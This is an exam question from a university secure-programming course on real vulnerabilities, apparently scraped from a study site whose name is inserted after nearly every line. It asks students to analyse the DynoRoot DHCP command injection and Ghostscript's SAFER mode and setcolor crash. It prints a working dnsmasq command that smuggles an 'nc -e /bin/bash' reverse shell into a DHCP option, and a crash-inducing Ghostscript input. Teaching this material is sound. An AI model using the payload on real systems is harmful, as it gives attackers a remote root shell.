[2019] INFR11098 SECURE PROGRAMMING - Final Exam - Q2 High Profile Vulnerabilities

2. This question concerns some high profile vulnerabilities found in real-world code. CourseNana.COM

  CourseNana.COM

(a) In May 2018, CVE-2018-1111 was published by Red Hat, reporting on a bug found by Felix Wilhelm of Google Security Team. The vulnerability became nicknamed “DynoRoot”. An exploit against the DHCP client in several versions of Linux is achieved with the code: CourseNana.COM

dnsmasq --interface=eth1 --bind-interfaces --except-interface=lo \ CourseNana.COM

--dhcp- range=10.1.1.1,10.1.1.10,1h \ CourseNana.COM

--conf-file=/dev/null --dhcp-opton=6,10.1.1.1 -- dhcp-opton=3,10.1.1.1 \ CourseNana.COM

--dhcp-opton="252,x’&nc -e /bin/bash 10.1.1.1 1337 #" CourseNana.COM

Recall that DHCP is a protocol that provides a machine connecting to a network with an IP address and other network settings. The program dnsmasq runs a DHCP server. CourseNana.COM

i. Explain carefully how you think the exploit works and what capability CourseNana.COM

it may give the attacker. [5 marks] CourseNana.COM

ii. What is the standard name for this kind of vulnerability? [1 mark] CourseNana.COM

iii. Give a scenario under which the attack could be mounted. [2 marks] CourseNana.COM

iv. What is the likely root cause of the problem and how would you go about fixing it? [2 marks] CourseNana.COM

v. Supposing you can’t patch the DHCP client running on a machine, suggest two other ways to avoid the problem. [2 marks] CourseNana.COM

  CourseNana.COM

(b) Artifex Ghostscript is a widely-used open source implementation of Adobe’s PostScript language. PostScript (PS) is an interpreted, dynamically typed, stack-based Turing-complete programming language which describes printed pages. Ghostscript is used in GUI applications, displaying PS and PDF documents, and as a library inside programs such as the ImageMagick image manipulator (often used in web applications) and the thumbnail generating utility used by some desktop environments. CourseNana.COM

i. Considering the usage modes of Ghostscript, suggest two threat scenarios for an attacker with a computationally expensive PS file. [2 marks] CourseNana.COM

ii. Ghostscript provides a restricted mode called SAFER which disables operators to delete and rename files and open piped commands. It is designed to make the program safer to run on untrusted PS files. Internally this is implemented with a flag which is set from a command CourseNana.COM

line option, -dSAFER. CourseNana.COM

  CourseNana.COM

Considering the code fragments in Figure 1 on the next page, which are part of the mechanism behind SAFER, discuss the security design of this option and contrast it with other mechanisms for restricting the privilege of a running process. CourseNana.COM

(Note: you are not expected to fully understand the PostScript code.) [5 marks] CourseNana.COM

iii. SAFER mode restricts reading files other than those given in the command line arguments or in paths from FONTPATH and LIBPATH environment variables. Suggest a possible attack vector for a graphics program run from a web server. [2 marks] CourseNana.COM

iv. An unexpected crash is caused in the Ghostscript interpreter when it is invoked like this: CourseNana.COM

$ gs -dSAFER CourseNana.COM

GS><< /Whatever /YouWant >> setpattern CourseNana.COM

Segmentation fault CourseNana.COM

(The user types input following the GS> prompt; the data inside << and>> defines a dictionary mapping the key Whatever to YouWant). The setpattern operator invokes setcolor. Considering the function header given in Figure 2 on the next page, explain what the problem might be here, the type of vulnerability involved, the possible consequences, and finally how the problem may be fixed. CourseNana.COM

  CourseNana.COM

187 % DELAYSAFER is effectively the same as newer NOSAFER CourseNana.COM

188 currentdict /DELAYSAFER known { /DELAYSAFER //true def /NOSAFER //true def } if CourseNana.COM

189 /SAFER currentdict /NOSAFER known { CourseNana.COM

190       //false CourseNana.COM

191 } { CourseNana.COM

192       currentdict /SAFER known CourseNana.COM

193       currentdict /PARANOIDSAFER known or % PARANOIDSAFER is equivalent CourseNana.COM

194 } CourseNana.COM

195 ifelse def CourseNana.COM

... CourseNana.COM

2232 /.setsafe CourseNana.COM

2233 { CourseNana.COM

2234     SAFETY /safe get not { CourseNana.COM

2235     << CourseNana.COM

2236     /PermitFileReading [ ] CourseNana.COM

2237     /PermitFileWriting [ ] CourseNana.COM

2238     /PermitFileControl [ ] CourseNana.COM

2239     >> setuserparams CourseNana.COM

2240 } CourseNana.COM

2241 if CourseNana.COM

2242     .locksafe CourseNana.COM

2243 } .bind executeonly odef CourseNana.COM

Figure 1: Fragments of gs_init.ps from Ghostscript for Question 2(b)ii. CourseNana.COM

  CourseNana.COM

250 /* CourseNana.COM

251 * <param1> ... <paramN> setcolor - CourseNana.COM

252 * CourseNana.COM

253 * Set the current color. All of the parameters except the topmost (paramN) are CourseNana.COM

254 * numbers; the topmost (and possibly only) entry may be pattern dictionary or CourseNana.COM

255 * a null object. CourseNana.COM

256 * CourseNana.COM

257 * The use of one operator to set both patterns and "normal" colors is CourseNana.COM

258 * consistent with Adobe’s documentation, but primarily reflects the use of CourseNana.COM

259 * gs_setcolor for both purposes in the graphic library. An alternate CourseNana.COM

260 * implementation would use a .setpattern operator, which would interface with CourseNana.COM

261 * gs_setpattern. CourseNana.COM

262 * CourseNana.COM

263 * This operator is hidden by a pseudo-operator of the same name, so it will CourseNana.COM

264 * only be invoked under controlled situations. Hence, it does no operand CourseNana.COM

265 * checking. CourseNana.COM

266 */ CourseNana.COM

267 static int CourseNana.COM

268 zsetcolor(i_ctx_t *i_ctx_p) { ... } CourseNana.COM

Figure 2: Fragment of zcolor.c from Ghostscript for Question 2(b)iv. CourseNana.COM